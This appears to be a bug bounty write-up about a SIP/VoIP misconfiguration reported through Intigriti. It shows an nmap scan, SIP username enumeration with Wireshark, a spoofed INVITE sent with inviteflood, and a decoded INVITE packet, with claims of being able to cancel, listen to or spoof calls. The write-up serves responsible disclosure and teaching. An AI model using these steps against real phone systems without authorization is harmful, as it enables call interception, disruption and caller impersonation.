VoIP Spoofing (Intigriti) 1,250€

Hello Folks, i just want to explain a misconfiguration that affect an asset on Intigriti. So, let’s start!!

What is VoIP?

VoIP implementation allows audio calls to be made using an Internet connection instead of a conventional phone. Some VoIP gateway partners may allow you to call others who have a phone number, including local, long distance, mobile, and international numbers.

VoIP uses 5060 as a SIP signaling port by default. Used to register the phone (for example, Cisco, Polycom, etc.)

Among the most important features of VoIP are:

- Use of multiple lines

- Voicemail service

- Voice recording

- Call log

- Modular configurations

What is SIP?

Session Initiation Protocol (SIP) allows users to establish communications, terminate, or modify voice or video calls. According to pentesting experts, voice or video traffic is transmitted via Real-Time Protocol (RTP). SIP is an application layer protocol that uses UDP or TCP for traffic. By default, SIP uses UDP/TCP port 5060.

Proof of Concept:

Realize that your target is 182.x.x.x/27, so i started using nmap and i started to scan the subnet, i just found an interesting IP that have the port 5060 open:

nmap -sC -sV -A -p- -T4 182.x.x.x
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-05 06:18 CDT
Nmap scan report for 182.x.x.x (194.x.x.x)
Host is up (0.038s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
443/tcp closed https
5060/tcp open sip?

first at all i used wireshark for take listen of this port and i found some username like:

Username Enumeration

Actually, i got so many usernames, and i can actually listen,register, delete, or spoof their call but how?

Let’s try to send an HIT request with a “Test” Username using inviteflood

Spoofing

As you can see i already sent call to the user “102” with a Test as username, let’s open wireshark and filter for SIP and see what happen:

Invite Call

As we can see i can invite to call any of their agents, using a VoIP spoofing, Currently, someone’s cell phone is ringing, and as you can see i Invite someone in their internal network IP start with 10.x.x.x . Now Let’s analyze that invite call.

Session Initiation Protocol (INVITE)
Request-Line: INVITE sip:102@194.x.x.x SIP/2.0
Method: INVITE
Request-URI: sip:102@194.x.x.x
Request-URI User Part: 102
Request-URI Host Part: 194.x.x.x
[Resent Packet: False]
Message Header
Via: SIP/2.0/UDP 192.168.1.6:9;branch=28a8d461-64d5-4636-9b0b-090000000001
Transport: UDP
Sent-by Address: 192.168.1.6
Sent-by port: 9
Branch: 28a8d461-64d5-4636-9b0b-090000000001
Max-Forwards: 70
Content-Length: 460
To: 102 <sip:102@194.x.x.x:5060>
SIP to display info: 102
SIP to address: sip:102@194.x.x.x:5060
From: Test <sip:Test@192.168.1.6:9>;tag=28a8da38-64d5-4636-b984-2a0000000001
SIP from display info: Test
SIP from address: sip:Test@192.168.1.6:9
SIP from address User Part: Test
SIP from address Host Part: 192.168.1.6
SIP from tag: 28a8da38-64d5-4636-b984-2a0000000001
Call-ID: 28a8df56-64d5-4636-b92f-5d0000000001
[Generated Call-ID: 28a8df56-64d5-4636-b92f-5d0000000001]
CSeq: 0000000001 INVITE
Sequence Number: 1
Method: INVITE
Supported: timer
Allow: NOTIFY
Allow: REFER
Allow: OPTIONS
Allow: INVITE
Allow: ACK
Allow: CANCEL
Allow: BYE
Content-Type: application/sdp
Contact: <sip:Test@192.168.1.6:9>
Contact URI: sip:Test@192.168.1.6:9
Supported: replaces
User-Agent: Elite 1.0 Brcm Callctrl/1.5.1.0 MxSF/v.3.2.6.26
Message Body

Ok as you can see i can NOTIFY, REFER, INVITE,ACK, CANCEL, BYE option. So i can CANCEL some outgoing call, i can LISTEN or Register inside call or spoof it.

This misconfiguration is marked as HIGH from the company and they rewarded me 1,250 EUR.

Rewarded

Marked High:

Resolved

Thank guys for reading, and Happy bug hunting!

  • 0xJin

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store